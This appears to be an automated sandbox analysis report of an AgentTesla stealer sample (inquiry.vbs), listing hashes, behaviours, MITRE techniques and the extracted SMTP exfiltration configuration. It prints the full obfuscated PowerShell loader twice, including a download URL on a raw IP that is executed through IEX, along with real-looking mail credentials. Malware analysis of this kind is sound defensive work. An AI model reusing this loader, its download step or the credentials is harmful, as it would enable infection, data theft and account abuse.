agenttesla | c3cd0879f2fd7d6329b64dce87249fd717145625e60bce03eb67f9ee2c8a10db

General

Target

inquiry.vbs
Size

94KB
MD5

5244eee364836dc693025ecf574f394d
SHA1

2e9dcc09dcae233d7bd7507a3685fd67e9d9c158
SHA256

c3cd0879f2fd7d6329b64dce87249fd717145625e60bce03eb67f9ee2c8a10db
SHA512

f29ace7bc68fa083606e6f0be5f697d92ec93fd936a85cc8bf6ce4511741b0e9d921cf92dfcd11ecf2de28bbde49e651c234db3d6c3a22baefacad7d09ff1585
SSDEEP

1536:SpAqmnwlpbjrWic4dYWN3xHEQPplcJGH8O+iPG707Q/gsUogUwnZI3:SpAqCwlpbjrHFYWBxHEQdcpiE07Q/gsj

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 4 IoCs

flow	pid	Process
7	2864	powershell.exe
29	1060	msiexec.exe
31	1060	msiexec.exe
34	1060	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2864	powershell.exe
1964	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
30	api.ipify.org
31	api.ipify.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2864	powershell.exe
1964	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1060	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1964	powershell.exe
1060	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2864	powershell.exe
2864	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1060	msiexec.exe
1060	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1964	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	1060	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1060	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4112 wrote to memory of 2864	4112	WScript.exe	82
PID 4112 wrote to memory of 2864	4112	WScript.exe	82
PID 1964 wrote to memory of 1060	1964	powershell.exe	93
PID 1964 wrote to memory of 1060	1964	powershell.exe	93
PID 1964 wrote to memory of 1060	1964	powershell.exe	93
PID 1964 wrote to memory of 1060	1964	powershell.exe	93

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\inquiry.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Dulses Generalforsamlingsdato Lovlighedens Labbernes #>;$Spond='Fjeldmarkens';<#Overspringende Handelsomstning Snestorms #>;$Krlighedsforholdenes=$host.PrivateData;If ($Krlighedsforholdenes) {$Psykoteknisk++;}function Unabused($Redaktrer){$Fjerbuskenes=$Skibsjournalen+$Redaktrer.Length-$Psykoteknisk;for( $Communalizer=4;$Communalizer -lt $Fjerbuskenes;$Communalizer+=5){$Pomposities='Zapped';$Roskildenseres+=$Redaktrer[$Communalizer];}$Roskildenseres;}function Associationsteknikkerne($Snnekonernes){ & ($Selektionsmekanismerne) ($Snnekonernes);}$Winnie=Unabused 'SterMSar oU.giz Kori.yall Isfl mu a,lac/ Me,5 Ul..navi0B.id Iden(Ka,kWSpiliTremnK okdUndeoCeruwOrgasAnt OutbN SulTUdfo Tria1Kjor0Brdr.Pren0Tr n;Sha, MiljWHjeriKrognSucc6Depr4.res;Pa a Lnpoxs lv6 Men4 Ro ; Syn reperKompvDemi:dolo1Lgeh2Inco1 le.Hand0prop)Me u RaaGarseekrybcScark T tofin./Chik2Fela0Infe1Farv0Infl0 Tai1 Non0Unki1 Cli G.atF Kdsi C lrTru eSundf Le o CamxChry/Aren1Haan2 A k1 kan. Vov0 Pan ';$Troskabens=Unabused ' FruuN,beSMigrEkr grOkay-For A.endg AtoEFlo.NSforTVigt ';$Dyttet=Unabused ' dechBombtUdsttImbepOpeg:Indb/Omde/Isce9Ingo1Avl..Kn p1Spur0 P i9 Pau.Mase2Akt 0Para.Sma.1Bone6Tant1 ,hr/S.raU NomnInsudThrieFnokr Annkscoll LogaKautsKosysSocieUnderEften AleeR te.Abe pMos fA limCyan ';$Manorialize=Unabused 'Poly> kil ';$Selektionsmekanismerne=Unabused 'blueIThe,e earX Fre ';$Endossementet='Waring';$Retorikken='\Udenlandsopholdenes.Fin';Associationsteknikkerne (Unabused ' Vid$Sid gStralBlitoVelvb Fo a Legl Gra: Sk SKo eyDropnuhard Sygi Silku sleKrakruntaeUndfdStowe rgu1Besp1 St,2 Ork= F n$DaimeBegnnTubevFree: Cona Attp earp F sdJubia iltNon,aUnb +Stv.$ FavRP eteEr ot vero ,ear He iTejskUdtykCon e AronOmve ');Associationsteknikkerne (Unabused ' Kol$FondgU smlFemio Vilbp wta.nrilGros:OfteUMai m hefbQuarr KulaGoyae Homn Kiwsse v= P.t$ LatD urnyAuret T,at RineBu.atjern.Forks PolpUdfolDogmiS bct Hyp( Bio$con.MMauha rrn agsoudglrkey,iTrizaStkklJahniBatiz CreePost)synt ');Associationsteknikkerne (Unabused 'Disp[BaldNRejoeTribtExce. Ga.SSu deKn gr edrvInteiStavc GeoeAntiPHalvo umi Ir,nDyppt uteMPap.a MjdnAsm aFootgIndueMedurZabi]Apic: Car:GevaSlan e dilcAl bu PrirMisai Mekt RecySociPKno,r ,ono IketInfeo PercOpteophotlKick Elvr=nove Tmni[HkerNUdspeFanetBevr.BemrSCompeInfrc Lepu D rrRenci ,latTeleyPr,ePElevrEcoro Frat B doSkr,cs naoTreslSamsTGo.syConvpCypreHopp]Bira:tara:MennTBestl Evas Spn1 Ben2 ung ');$Dyttet=$Umbraens[0];$Nonexperimental=(Unabused 'H dr$TeskgnubiLTi bosupebPuttABru lSkna:Vieri dygNLivrD empsAn iMSp dUHogbgArvelTangiRei nT.keGDrkaeAl.iR ntrNRumse,ants,and2Grn 0 For0Conv=InddnDopiEOf ewHete-Grano .olbFl cJDrifEM ssCBarbtCo g BoxsNeueYDataSfristqu deLue m it.CharnJaileUnslt rbe.OpstWCarnEG,vib StvcUnbrLTe nirag EUrtiNHymetOver ');Associationsteknikkerne ($Nonexperimental);Associationsteknikkerne (Unabused ' Byg$G.stI Forn,eskd D rsVis mRytmuHjrngcivilCuckiOu.inRegngZoneetrear QuinEstueProbs ese2Nobb0Wark0 .oi.StavH Sh eIcklaT audAdvieFjerrOutssPige[Syns$LngeTStrirChrooVar.sKurskM era Tr bOp,keRejunDia sGril]re u=,ent$Pan.WLongi rren VirnhreliB taeI de ');$Tegnfejls=Unabused 'Zeph$ AntICompnA end AnosPinamEngluRigsgPleulPs ui ehnAmatgTriceRed rEnten ReseCosssAffa2 Inf0Krum0Paa,. Ud DSteno A twBlnkn Pa l Hjuo SmaaEm.nd GjoFHy.ric tclSulpePull(Fo,m$ SunDdeprySovjt Ru.t A.seAfgit Opl, Sti$KoncM Im emacrtSkataKrbbsforgtSla a orpsUnsciUnduz Rr,eSluksSanh)Co,p ';$Metastasizes=$Syndikerede112;Associationsteknikkerne (Unabused 'Tyks$TampG Ly.lM rgO TilBbeleaRuptL xte:L ppsDanmYI dgN Hydo ,orNInstYO.semJyd ibirikP ed= ork(Ambot RifeDidrsplanTflu -TherPOm nAStertWcerhCurc Ampu$TurmmKalkEOrchTPersaPr,lsSy dtAlp.Ate es HviIUdbeZstateStvlspena)Zeph ');while (!$Synonymik) {Associationsteknikkerne (Unabused ' Dru$ Afkg AntlPedaoRe,pb TilaOve lTran:StueMLavtaTongdUnfrbNet rForsa dekiFeu nBevi=Over$ KoatLat rSti uElv eSupe ') ;Associationsteknikkerne $Tegnfejls;Associationsteknikkerne (Unabused 'WeddS UnptUns,aChicrArbetPote-AethS Budl .okePr feHoolplov, Hav4U,vi ');Associationsteknikkerne (Unabused 'Onde$SupegFr.tlFl soAnsgbRaafaForfl A s:LuksSAdheyOr anLeveoSourn Eg y,dfam Fori FrikA be=Exte(TegnTUdfoeGasssFredtHedy-A odP Re.ahypst Oveh Br Genn$ ruMFe teEndetUdtaaUnc s ud tMo ea rips,seui onszBeste,ndesEnri)Bres ') ;Associationsteknikkerne (Unabused 'Epis$drilgDommlMureoAposbRabuaFdevlrach:InspGAmbroG thrFiskb,nmoeLadytMiti= udv$Gbakg na.lOk aoDiffbS.lia Konl ari:HerrETenatC.ltaGalaaDjvlr Ge sdiskfHy.gdpacssPipeeKlovlPoets Ch.dT icaPseugUstee Pa nMidte oossBldh+ Cli+Frih%Ha j$Fo pU,ithmVan.bForar Q,aa brieTeatnEly,sClem.Paryc stao F luFer nOve,t Fib ') ;$Dyttet=$Umbraens[$Gorbet];}$Retsbeskyttelsesperioden54=286648;$Sprngbombes=29720;Associationsteknikkerne (Unabused 'Be,r$Confg.illlmyopoapotb mpaJohalPunc: nevC.ussobioesMargeBlodi,nknsRigtmProsaForklFors D mk= agl TilsGSp defugutUdhu- ResCDangoSimunmlket BoseTrann UnutGotf Sorb$ RotMC emePalmt SkraReces LumtOpioaPalas UniiUncazMinie F.rsReno ');Associationsteknikkerne (Unabused ' Squ$Hretg C.llhjlaoNonibKiauaFi hl orc:St iAGhe,cPr lcSm du ,onrMoulsEcrae SandGavinPathe,aves SemsStuk2 Ret0Assi3Udan Taa=Bic, No a[ fteSLu by H rs Sstt isteho dm Mis.RaceComlao ButnHuswv awe Os r.oritOkeh] Afs:Exoa:In,eFBioprHydro OvemdrmeBPro a lacsStreeAbor6Ho.o4PaleSD,rmtNaturSus iSpi nNa bg ,ha(Fyrv$PrayC ondoSkygs rinePartiss es BromSkedaRes llamm)Unti ');Associationsteknikkerne (Unabused 'Labi$fab gGin lDrosoForsbSteraUnstlPret:CounG iscySloinVel oOversQuinpBeskoEdgirInteaEuphnProjg triIganuUdlsm Tek Med,=Syne ghet[Fou SOpenyLbn,s Funt GeneT knmdros.statTVeraeFilmxVelvtKokk.IncuE MinnBirkc Smeo SigdToneiVisnn .elgMele]Dark:Skim: onAExprSLnfoCCentIJe cIUdho. AtrGRhabe Nset .enStuattSou.rVotiiMuttnDobbgSlum(A pe$udvaAA,sucUnuscOveru CykrSupesforseBr vdThe nSammeSvensH drsScan2Sona0 .op3Tord)Brst ');Associationsteknikkerne (Unabused 'Fobi$StabgchaulPentoForebPro,aSm rlKa a:LndeKClicr UopiGstesSto tOvereSn rlA tiiMi.agTe rtLaug=Adip$tolnG B gy Agtn.ensoSekss ,unpSersomellrTandaHindn HregpantiUninuDeclm dvi.Plurs,emyuSlotbBonhsTarntPal.rSporiForhnAcq gFobi(Fest$ BriRMidseEnnot Caps Un bAfskeP rusNed k Undy omt Kejt pareTwisl TvisD rfeTufasKo,gpFlo eMo,lrKonfi.edeoLethdGe teAnsln P o5Di.p4Unwr, O t$Par SS ilp arvrL.denSoongAbekbTopeoDannmElevbLykeeJo,nsSeer)U de ');Associationsteknikkerne $Kristeligt;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Dulses Generalforsamlingsdato Lovlighedens Labbernes #>;$Spond='Fjeldmarkens';<#Overspringende Handelsomstning Snestorms #>;$Krlighedsforholdenes=$host.PrivateData;If ($Krlighedsforholdenes) {$Psykoteknisk++;}function Unabused($Redaktrer){$Fjerbuskenes=$Skibsjournalen+$Redaktrer.Length-$Psykoteknisk;for( $Communalizer=4;$Communalizer -lt $Fjerbuskenes;$Communalizer+=5){$Pomposities='Zapped';$Roskildenseres+=$Redaktrer[$Communalizer];}$Roskildenseres;}function Associationsteknikkerne($Snnekonernes){ & ($Selektionsmekanismerne) ($Snnekonernes);}$Winnie=Unabused 'SterMSar oU.giz Kori.yall Isfl mu a,lac/ Me,5 Ul..navi0B.id Iden(Ka,kWSpiliTremnK okdUndeoCeruwOrgasAnt OutbN SulTUdfo Tria1Kjor0Brdr.Pren0Tr n;Sha, MiljWHjeriKrognSucc6Depr4.res;Pa a Lnpoxs lv6 Men4 Ro ; Syn reperKompvDemi:dolo1Lgeh2Inco1 le.Hand0prop)Me u RaaGarseekrybcScark T tofin./Chik2Fela0Infe1Farv0Infl0 Tai1 Non0Unki1 Cli G.atF Kdsi C lrTru eSundf Le o CamxChry/Aren1Haan2 A k1 kan. Vov0 Pan ';$Troskabens=Unabused ' FruuN,beSMigrEkr grOkay-For A.endg AtoEFlo.NSforTVigt ';$Dyttet=Unabused ' dechBombtUdsttImbepOpeg:Indb/Omde/Isce9Ingo1Avl..Kn p1Spur0 P i9 Pau.Mase2Akt 0Para.Sma.1Bone6Tant1 ,hr/S.raU NomnInsudThrieFnokr Annkscoll LogaKautsKosysSocieUnderEften AleeR te.Abe pMos fA limCyan ';$Manorialize=Unabused 'Poly> kil ';$Selektionsmekanismerne=Unabused 'blueIThe,e earX Fre ';$Endossementet='Waring';$Retorikken='\Udenlandsopholdenes.Fin';Associationsteknikkerne (Unabused ' Vid$Sid gStralBlitoVelvb Fo a Legl Gra: Sk SKo eyDropnuhard Sygi Silku sleKrakruntaeUndfdStowe rgu1Besp1 St,2 Ork= F n$DaimeBegnnTubevFree: Cona Attp earp F sdJubia iltNon,aUnb +Stv.$ FavRP eteEr ot vero ,ear He iTejskUdtykCon e AronOmve ');Associationsteknikkerne (Unabused ' Kol$FondgU smlFemio Vilbp wta.nrilGros:OfteUMai m hefbQuarr KulaGoyae Homn Kiwsse v= P.t$ LatD urnyAuret T,at RineBu.atjern.Forks PolpUdfolDogmiS bct Hyp( Bio$con.MMauha rrn agsoudglrkey,iTrizaStkklJahniBatiz CreePost)synt ');Associationsteknikkerne (Unabused 'Disp[BaldNRejoeTribtExce. Ga.SSu deKn gr edrvInteiStavc GeoeAntiPHalvo umi Ir,nDyppt uteMPap.a MjdnAsm aFootgIndueMedurZabi]Apic: Car:GevaSlan e dilcAl bu PrirMisai Mekt RecySociPKno,r ,ono IketInfeo PercOpteophotlKick Elvr=nove Tmni[HkerNUdspeFanetBevr.BemrSCompeInfrc Lepu D rrRenci ,latTeleyPr,ePElevrEcoro Frat B doSkr,cs naoTreslSamsTGo.syConvpCypreHopp]Bira:tara:MennTBestl Evas Spn1 Ben2 ung ');$Dyttet=$Umbraens[0];$Nonexperimental=(Unabused 'H dr$TeskgnubiLTi bosupebPuttABru lSkna:Vieri dygNLivrD empsAn iMSp dUHogbgArvelTangiRei nT.keGDrkaeAl.iR ntrNRumse,ants,and2Grn 0 For0Conv=InddnDopiEOf ewHete-Grano .olbFl cJDrifEM ssCBarbtCo g BoxsNeueYDataSfristqu deLue m it.CharnJaileUnslt rbe.OpstWCarnEG,vib StvcUnbrLTe nirag EUrtiNHymetOver ');Associationsteknikkerne ($Nonexperimental);Associationsteknikkerne (Unabused ' Byg$G.stI Forn,eskd D rsVis mRytmuHjrngcivilCuckiOu.inRegngZoneetrear QuinEstueProbs ese2Nobb0Wark0 .oi.StavH Sh eIcklaT audAdvieFjerrOutssPige[Syns$LngeTStrirChrooVar.sKurskM era Tr bOp,keRejunDia sGril]re u=,ent$Pan.WLongi rren VirnhreliB taeI de ');$Tegnfejls=Unabused 'Zeph$ AntICompnA end AnosPinamEngluRigsgPleulPs ui ehnAmatgTriceRed rEnten ReseCosssAffa2 Inf0Krum0Paa,. Ud DSteno A twBlnkn Pa l Hjuo SmaaEm.nd GjoFHy.ric tclSulpePull(Fo,m$ SunDdeprySovjt Ru.t A.seAfgit Opl, Sti$KoncM Im emacrtSkataKrbbsforgtSla a orpsUnsciUnduz Rr,eSluksSanh)Co,p ';$Metastasizes=$Syndikerede112;Associationsteknikkerne (Unabused 'Tyks$TampG Ly.lM rgO TilBbeleaRuptL xte:L ppsDanmYI dgN Hydo ,orNInstYO.semJyd ibirikP ed= ork(Ambot RifeDidrsplanTflu -TherPOm nAStertWcerhCurc Ampu$TurmmKalkEOrchTPersaPr,lsSy dtAlp.Ate es HviIUdbeZstateStvlspena)Zeph ');while (!$Synonymik) {Associationsteknikkerne (Unabused ' Dru$ Afkg AntlPedaoRe,pb TilaOve lTran:StueMLavtaTongdUnfrbNet rForsa dekiFeu nBevi=Over$ KoatLat rSti uElv eSupe ') ;Associationsteknikkerne $Tegnfejls;Associationsteknikkerne (Unabused 'WeddS UnptUns,aChicrArbetPote-AethS Budl .okePr feHoolplov, Hav4U,vi ');Associationsteknikkerne (Unabused 'Onde$SupegFr.tlFl soAnsgbRaafaForfl A s:LuksSAdheyOr anLeveoSourn Eg y,dfam Fori FrikA be=Exte(TegnTUdfoeGasssFredtHedy-A odP Re.ahypst Oveh Br Genn$ ruMFe teEndetUdtaaUnc s ud tMo ea rips,seui onszBeste,ndesEnri)Bres ') ;Associationsteknikkerne (Unabused 'Epis$drilgDommlMureoAposbRabuaFdevlrach:InspGAmbroG thrFiskb,nmoeLadytMiti= udv$Gbakg na.lOk aoDiffbS.lia Konl ari:HerrETenatC.ltaGalaaDjvlr Ge sdiskfHy.gdpacssPipeeKlovlPoets Ch.dT icaPseugUstee Pa nMidte oossBldh+ Cli+Frih%Ha j$Fo pU,ithmVan.bForar Q,aa brieTeatnEly,sClem.Paryc stao F luFer nOve,t Fib ') ;$Dyttet=$Umbraens[$Gorbet];}$Retsbeskyttelsesperioden54=286648;$Sprngbombes=29720;Associationsteknikkerne (Unabused 'Be,r$Confg.illlmyopoapotb mpaJohalPunc: nevC.ussobioesMargeBlodi,nknsRigtmProsaForklFors D mk= agl TilsGSp defugutUdhu- ResCDangoSimunmlket BoseTrann UnutGotf Sorb$ RotMC emePalmt SkraReces LumtOpioaPalas UniiUncazMinie F.rsReno ');Associationsteknikkerne (Unabused ' Squ$Hretg C.llhjlaoNonibKiauaFi hl orc:St iAGhe,cPr lcSm du ,onrMoulsEcrae SandGavinPathe,aves SemsStuk2 Ret0Assi3Udan Taa=Bic, No a[ fteSLu by H rs Sstt isteho dm Mis.RaceComlao ButnHuswv awe Os r.oritOkeh] Afs:Exoa:In,eFBioprHydro OvemdrmeBPro a lacsStreeAbor6Ho.o4PaleSD,rmtNaturSus iSpi nNa bg ,ha(Fyrv$PrayC ondoSkygs rinePartiss es BromSkedaRes llamm)Unti ');Associationsteknikkerne (Unabused 'Labi$fab gGin lDrosoForsbSteraUnstlPret:CounG iscySloinVel oOversQuinpBeskoEdgirInteaEuphnProjg triIganuUdlsm Tek Med,=Syne ghet[Fou SOpenyLbn,s Funt GeneT knmdros.statTVeraeFilmxVelvtKokk.IncuE MinnBirkc Smeo SigdToneiVisnn .elgMele]Dark:Skim: onAExprSLnfoCCentIJe cIUdho. AtrGRhabe Nset .enStuattSou.rVotiiMuttnDobbgSlum(A pe$udvaAA,sucUnuscOveru CykrSupesforseBr vdThe nSammeSvensH drsScan2Sona0 .op3Tord)Brst ');Associationsteknikkerne (Unabused 'Fobi$StabgchaulPentoForebPro,aSm rlKa a:LndeKClicr UopiGstesSto tOvereSn rlA tiiMi.agTe rtLaug=Adip$tolnG B gy Agtn.ensoSekss ,unpSersomellrTandaHindn HregpantiUninuDeclm dvi.Plurs,emyuSlotbBonhsTarntPal.rSporiForhnAcq gFobi(Fest$ BriRMidseEnnot Caps Un bAfskeP rusNed k Undy omt Kejt pareTwisl TvisD rfeTufasKo,gpFlo eMo,lrKonfi.edeoLethdGe teAnsln P o5Di.p4Unwr, O t$Par SS ilp arvrL.denSoongAbekbTopeoDannmElevbLykeeJo,nsSeer)U de ');Associationsteknikkerne $Kristeligt;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:1060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d34112a7b4df3c9e30ace966437c5e40

SHA1
ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

SHA256
cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

SHA512
49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_heftjxxr.5wl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Udenlandsopholdenes.Fin

Filesize
411KB

MD5
5b7d242a7b5b4a37c84d10e5e152f968

SHA1
197e08451d9962cb1018324759bc1ebbb4162b7a

SHA256
0307fd03bee806c65f0bdb652edf2529f87cd23d8ec21bb6f9e8688731884d89

SHA512
4b818e126d96d156faf3c353ed07f704f3342938f2c6fde400edd98e77f5560096576bc44c63a7dfb3633e75a63306d100c0d7c96ec41ce5b479e825128fa074

Download Submit
memory/1060-52-0x0000000021C60000-0x0000000021C6A000-memory.dmp

Filesize
40KB

Download
memory/1060-51-0x0000000021D30000-0x0000000021DC2000-memory.dmp

Filesize
584KB

Download
memory/1060-49-0x0000000021C90000-0x0000000021D2C000-memory.dmp

Filesize
624KB

Download
memory/1060-48-0x0000000021BA0000-0x0000000021BF0000-memory.dmp

Filesize
320KB

Download
memory/1060-47-0x0000000000C60000-0x0000000000CA0000-memory.dmp

Filesize
256KB

Download
memory/1060-46-0x0000000000C60000-0x0000000001EB4000-memory.dmp

Filesize
18.3MB

Download
memory/1964-42-0x0000000007780000-0x00000000077A2000-memory.dmp

Filesize
136KB

Download
memory/1964-41-0x00000000077E0000-0x0000000007876000-memory.dmp

Filesize
600KB

Download
memory/1964-23-0x00000000058B0000-0x00000000058D2000-memory.dmp

Filesize
136KB

Download
memory/1964-24-0x0000000005950000-0x00000000059B6000-memory.dmp

Filesize
408KB

Download
memory/1964-25-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/1964-35-0x0000000006150000-0x00000000064A4000-memory.dmp

Filesize
3.3MB

Download
memory/1964-21-0x0000000002EF0000-0x0000000002F26000-memory.dmp

Filesize
216KB

Download
memory/1964-37-0x0000000006780000-0x000000000679E000-memory.dmp

Filesize
120KB

Download
memory/1964-38-0x00000000067C0000-0x000000000680C000-memory.dmp

Filesize
304KB

Download
memory/1964-39-0x0000000008170000-0x00000000087EA000-memory.dmp

Filesize
6.5MB

Download
memory/1964-40-0x0000000006D30000-0x0000000006D4A000-memory.dmp

Filesize
104KB

Download
memory/1964-22-0x00000000059F0000-0x0000000006018000-memory.dmp

Filesize
6.2MB

Download
memory/1964-45-0x0000000008DA0000-0x000000000A017000-memory.dmp

Filesize
18.5MB

Download
memory/1964-43-0x00000000087F0000-0x0000000008D94000-memory.dmp

Filesize
5.6MB

Download
memory/2864-20-0x00007FF95A9B0000-0x00007FF95B471000-memory.dmp

Filesize
10.8MB

Download
memory/2864-0-0x00007FF95A9B3000-0x00007FF95A9B5000-memory.dmp

Filesize
8KB

Download
memory/2864-17-0x00007FF95A9B0000-0x00007FF95B471000-memory.dmp

Filesize
10.8MB

Download
memory/2864-16-0x00007FF95A9B3000-0x00007FF95A9B5000-memory.dmp

Filesize
8KB

Download
memory/2864-15-0x00007FF95A9B0000-0x00007FF95B471000-memory.dmp

Filesize
10.8MB

Download
memory/2864-12-0x00007FF95A9B0000-0x00007FF95B471000-memory.dmp

Filesize
10.8MB

Download
memory/2864-11-0x00007FF95A9B0000-0x00007FF95B471000-memory.dmp

Filesize
10.8MB

Download
memory/2864-1-0x000001BBE6F30000-0x000001BBE6F52000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads